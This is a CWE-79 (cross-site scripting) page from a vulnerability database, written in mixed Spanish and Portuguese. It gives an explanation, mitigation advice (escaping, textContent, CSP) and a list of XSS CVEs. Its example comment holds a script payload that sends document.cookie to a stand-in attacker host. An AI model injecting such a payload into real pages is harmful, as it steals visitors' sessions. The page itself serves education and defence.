Fallos del tipo CWE-79

28.773 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2023-36809HIGHKiwi TCMS's misconfigured HTTP headers allow stored XSS execution with FirefoxEPSS 0.7%CVE-2022-24709HIGHCross site scripting in @awsui/components-reactEPSS 0.7%CVE-2022-4271HIGHCross-site Scripting (XSS) - Reflected in osticket/osticketEPSS 0.7%CVE-2025-41393MEDIUMReflected cross-site scripting vulnerability exists in the laser printers and MFPs (multifunction printers) which implement Ricoh Web Image EPSS 0.7%CVE-2026-4313LOWStored XSS in AdaptiveGRCEPSS 0.7%CVE-2018-16481—A XSS vulnerability was found in html-page <=2.1.1 that allows malicious Javascript code to be executed in the user's browser due to the absEPSS 0.7%CVE-2023-26131MEDIUMAll versions of the package github.com/xyproto/algernon/engine; all versions of the package github.com/xyproto/algernon/themes are vulnerablEPSS 0.7%CVE-2021-24225—Advanced Booking Calendar < 1.6.7 - Authenticated Reflected Cross-Site Scripting (XSS)EPSS 0.7%CVE-2024-27300MEDIUMphpMyFAQ Stored XSS at user emailEPSS 0.7%CVE-2023-4979HIGHCross-site Scripting (XSS) - Reflected in librenms/librenmsEPSS 0.7%CVE-2023-0549LOWYAFNET Private Message PostPrivateMessage cross site scriptingEPSS 0.7%CVE-2024-7644MEDIUMSourceCodester Leads Manager Tool Add Leads add-leads.php cross site scriptingEPSS 0.7%CVE-2021-27436—WebAccess/SCADA Versions 9.0 and prior is vulnerable to cross-site scripting, which may allow an attacker to send malicious JavaScript code EPSS 0.7%CVE-2023-4980HIGHCross-site Scripting (XSS) - Generic in librenms/librenmsEPSS 0.7%CVE-2021-34361MEDIUMReflected XSS Vulnerability in Proxy ServerEPSS 0.7%CVE-2021-38680MEDIUMReflected XSS in Kazoo ServerEPSS 0.7%CVE-2023-5485MEDIUMInappropriate implementation in Autofill in Google Chrome prior to 118.0.5993.70 allowed a remote attacker to bypass autofill restrictions vEPSS 0.7%CVE-2024-44088MEDIUMApache Geode: Reflected XSSEPSS 0.7%CVE-2024-3542LOWCampcodes Church Management System add_visitor.php cross site scriptingEPSS 0.7%CVE-2021-29106MEDIUMThere is a reflected Cross Site Scripting (XSS) vulnerability in Esri ArcGIS Server version 10.8.1 and below.EPSS 0.7%